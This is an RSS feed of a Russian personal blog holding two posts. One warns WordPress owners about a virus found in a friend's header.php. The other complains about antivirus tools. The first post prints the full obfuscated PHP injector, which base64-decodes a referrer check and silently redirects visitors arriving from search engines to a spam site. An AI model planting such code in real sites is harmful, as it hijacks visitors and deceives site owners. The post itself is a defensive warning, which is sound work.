<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>PION2eR &#187; вирус</title> <atom:link href="http://www.pion2er.ru/tag/virus/feed/" rel="self" type="application/rss+xml" /><link>http://www.pion2er.ru</link> <description>Личный блого-дневник</description> <lastBuildDate>Thu, 22 Jul 2010 21:01:05 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.1.4</generator> <item><title>Заломали</title><link>http://www.pion2er.ru/2010/02/16/zalomali/</link> <comments>http://www.pion2er.ru/2010/02/16/zalomali/#comments</comments> <pubDate>Tue, 16 Feb 2010 08:47:38 +0000</pubDate> <dc:creator>Pion2er</dc:creator> <category><![CDATA[Блогинг]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[вирус]]></category> <category><![CDATA[дыра]]></category> <category><![CDATA[редирект]]></category><guid isPermaLink="false">http://www.pion2er.ru/?p=357</guid> <description><![CDATA[Сегодня у Костика на сайте Steinar.ru обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого &#8220;http://magik-tunes.com/?&#038;wmid=112&#8243;. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один [...]]]></description> <content:encoded><![CDATA[<p>Сегодня у Костика на сайте <noindex><a rel="nofollow" title="http://Steinar.ru/" target="_blank" href="http://www.pion2er.ru/wp-content/plugins/extredj/red.php?ext=aHR0cDovL1N0ZWluYXIucnUv">Steinar.ru</a></noindex> обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого &#8220;http://magik-tunes.com/?&#038;wmid=112&#8243;. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.</p><p>Вот код вируса:</p><pre class="brush: php;">
&lt;? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?&gt;&lt;?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?&gt;
</pre><p>Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает &#8211; это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.</p> ]]></content:encoded> <wfw:commentRss>http://www.pion2er.ru/2010/02/16/zalomali/feed/</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Гребанные вирусы</title><link>http://www.pion2er.ru/2009/08/06/grebannye-virusy/</link> <comments>http://www.pion2er.ru/2009/08/06/grebannye-virusy/#comments</comments> <pubDate>Thu, 06 Aug 2009 11:16:47 +0000</pubDate> <dc:creator>Pion2er</dc:creator> <category><![CDATA[Разное]]></category> <category><![CDATA[взлом]]></category> <category><![CDATA[вирус]]></category> <category><![CDATA[ддос]]></category> <category><![CDATA[кряк]]></category> <category><![CDATA[спам]]></category> <category><![CDATA[троян]]></category> <category><![CDATA[хакер]]></category><guid isPermaLink="false">http://www.pion2er.ru/?p=257</guid> <description><![CDATA[Помню еще очень и очень давно, когда у меня был компьютер с 286 процессором, а потом 386, 486 и так далее, тоже существовали вирусы которые клеились к запускаемым ЕХЕ и СОМ файлам. Были спец проги, которые умели подцеплять различные трояны к программам. Такое я тоже пробовал. И еще помнится мне я даже сам писал на [...]]]></description> <content:encoded><![CDATA[<p>Помню еще очень и очень давно, когда у меня был компьютер с 286 процессором, а потом 386, 486 и так далее, тоже существовали вирусы которые клеились к запускаемым ЕХЕ и СОМ файлам. Были спец проги, которые умели подцеплять различные трояны к программам. Такое я тоже пробовал. И еще помнится мне я даже сам писал на ассемблере вирус простенький, по книжке конечно, но размножался он на ура.</p><p>И уже тогда были антивирусы, которые умели лечить и вычленять эти вирусы и трояны из программ и при этом программы оставались работоспособными. Но теперь я просто не понимаю ничего. Теперь я еще не встречал ни одного антивируса, который бы смог вылечить хоть один файл от трояна. Че это за х&#8230;ня ваще? Они предлагают либо удалить нах.. файл с вирусом, либо засунуть его в карантин, либо просто закрыть к нему доступ! Нахера спрашивается мне это файл в карантине или с закрытым доступом, когда мне нужно что бы программа работала?</p><p>Либо программеры антивирусов совсем обленились и не хотят разбираться в том, как вычленить вирусяку из файла, либо хакеры научились настолько плотно внедрять свое дерьмо в программы, что достать их от туда можно только убив саму программу, что мне кажется маловероятным, т.к. уж слишком быстро появляется взломанный софт с трояном внутри.</p><p>Жаль, раньше хакеры ломали программы и игры с идеей о том, что информация должна быть доступна всем, теперь же только с целью наживы, а нажива &#8211; это трояны и вирусы, которые либо воруют личные данные, либо превращают ваш комп в зомби, которым потом будут пользоваться в своих грязных целях, таких как спам, ддос, и другой хрени.</p> ]]></content:encoded> <wfw:commentRss>http://www.pion2er.ru/2009/08/06/grebannye-virusy/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
